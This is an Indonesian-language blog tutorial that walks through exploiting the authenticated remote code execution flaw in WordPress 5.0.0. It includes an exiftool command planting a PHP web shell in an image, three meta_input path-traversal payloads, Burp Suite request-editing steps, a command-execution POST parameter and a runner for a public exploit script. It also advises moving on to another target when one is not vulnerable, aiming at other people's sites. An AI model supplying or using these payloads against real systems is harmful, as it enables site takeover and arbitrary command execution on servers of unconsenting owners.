WordPress Core 5.0.0 Authenticated Remote Code Execution


 -

Hai Sobat

Saya ikal,

Disini saya akan sharing sharing nih.

-


Kali ini kita akan membahas salah satu exploit yang sudah lumayan tua yaitu Remote Code Execution pada WordPress via image uploaded. Saya akan menjelaskan step,payload,dan lainnya secara rinci dan saya harap kalian mengerti.


Bahan : 

- Exiftool or Jhead

- BurpSuite : Download diwebsite resmi postwigger

- Payload : 

  1. &meta_input[_wp_attached_file]=year/month/filename#/filename
  2. &meta_input[_wp_attached_file]=year/month/filename#/../../../../themes/themename/filename
  3. &meta_input[_wp_page_template]=cropped filename

1. Create malicious image.
Hal pertama yang harus kita lakukan adalah memasukan php code kedalam sebuah gambar. kita bisa gunakan tools yang bernama Jhead,dan Exiftool. Untuk step ini kalian mungkin sudah pada paham, jika belum paham copy dan pastekan salah satu command dibawah pada terminal kalian.

jhead -ce filename.jpg

exiftool -Comment="<?php echo shell_exec(\$_POST['yolo']); ?>"

 

atau kalian bisa gunakan punya saya yang sudah jadi.




2. Upload the image.

Setelah kalian melakukan step 1, lanjut kalian jalankan burpsuite pada device kalian masing - masing. Akses target kalian dan lakukan login dengan akun yang ada.



Jika sudah login,kalian pergi ke Media lalu Klik Add New atau kalian bisa akses saja langsung dengan menempelkan /media-new.php pada search bar tepat setelah /wp-admin/. Sebelumnya,pastikan Intercept pada BurpSuite kalian Off terlebih dahulu. Kembali ke topik jika kalian sudah mengakses url diatas kalian klik Select Files lalu upload File gambar yang telah disisipi php code tadi. Biarkan penguploadan selesai hingga 100% lalu muncul button edit.



Jika sudah seperti gambar diatas, kalian klik Edit lalu balik ke BurpSuite, Aktifkan Intercept dan kembali ketarget kalian dan klik tombol biru bertuliskan Update dan cek requestan yang ditangkap oleh BurpSuite.



Klik Action lalu klik Send to repeater. "Bang kalo isi requestannya beda masalah ga bang?" Ga masalah. Lanjut,jika sudah dikirim ke repeater kalian Nonaktifkan Interceptnya dengan mengklik Intercept Is On.


Jika sudah,kalian akses Media lalu klik Library pada target kalian. atau kalian dapat menempelkan /upload.php setelah /wp-admin/. Klik gambar kalian, biasanya dipaling pojok kiri atas.



Klik Edit Image dan pangkas gambar kalian. Unuk cara pangkasnya kalian pikir pikir sendiri. Balik ke BurpSuite lalu nyalakan Interceptnya, Akses target kalian lalu klik Save.


Cek BurpSuite kalian klik Action,Send to repeater request yang ada lalu Off kan kembali Interceptnya.


3. Exploit step

Jika step 1 dan 2 sudah kalian jalankan dengan benar. lanjut ke step 3, kalian ke BurpSuite dan klik yang bertuliskan Repeater. Disana ada 2 requestan dari step 2.



Salin payload pertama yang ada diatas ubah year menjadi tahun,month menjadi bulan,filename menjadi nama gambar yang diupload. Tempelkan payloadnya dibarisan paling bawah pada requestan pertama.



Jika sudah,klik send dan pergi kerequestan yang kedua dan klik send. Lihat dibagian Response apakah tulisan # dan seterusnya akan tereksekusi atau tidak. Jika muncul maka kemungkinan target kalian vuln,jika tidak muncul skip dan cari target yang lain saja.



Nah muncul :D. Lanjut kita salin payload kedua dan seperti tadi kita ubah year menjadi tahun,month menjadi bulan,filename menjadi gambar yang kalian upload,dan themename menjadi nama theme yang terpakai pada target kalian. Akses requestan pertama hapus payload sebelumnya dan pastekan payload yang kedua tadi dan klik Send.


Untuk mengetahui tema apa yang dipakai,kalian akses halaman index target kalian dan lakukan view-source. Ctrl + F ketikan /themes/ lalu enter.



balik lagi ke requestan yang kedua klik send aja langsung dan lihat pada response apakah payload berhasil masuk atau tidak.



Nah jika muncul #/blablabla berarti payload berhasil dieksekusi. Okeh lanjut ke tahap terakhir. pertama kalian salin nama file yang tercantum pada requestan kedua tepatnya sesudah /namatheme/. 


Akses target kalian lalu klik Posts lalu Add New. Untuk title bisa kalian isi asal saja, dan untuk isi postnya kalian kosong kan saja.



Balik ke BurpSuite dan aktifkan Interceptnya. Jika sudah On, Kalian balik ketarget dan klik Submit For Review untuk mempublish artikelnya. Cek BurpSuite dan klik Action,Send to repeater request yang ada lalu Off kan Interceptnya. 


Salin payload ketiga dan ganti cropped filename dengan nama file yang kalian dapat pada request kedua, kalo ga ngerti scroll atas lagi dah. Pergi ke BurpSuite dan klik Repeater. Scroll kebawah dan tempelkan payload ketiga tadi lalu klik Send.



Jika sudah. kalian tinggal akses saja artikelnya dengan cara seperti ini.

https://localhost/?p=[id]


idnya bisa kalian dapat pada request ketiga. ketikan post_id pada search bar BurpSuite kalian dan itulah id dari post kalian tadi. Jika exploitasi dilakukan dengan benar dan target memang vuln,maka post yang muncul bukanlah tulisan,dan sebagainya melainkan akan muncul isi dari file gambar yang telah kalian sisipi php code tadi.



Dan untuk RCE nya kalian tinggal lakukan seperti ini.

https://localhost/?p=[id]


Post : 

yoloo=[command]


Ettt mungkin kalian sudah baca dari atas sampai sini,Dan otak kalian bingung :D. tenang disini sekalian saya post tentang botnya. Jadi kalian tidak perlu exploitasi step by step sendiri :D kalian cukup jalankan botnya dengan command.


python3 49512.py https://localhost/ username password temayangdipakai

 


Scriptnya bisa didownload dibawah ini.



NB : Pastikan file gambar dan script exploit berada disatu folder yang sama.


Referensi : 

https://www.exploit-db.com/exploits/49512


Thanks

See U

Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.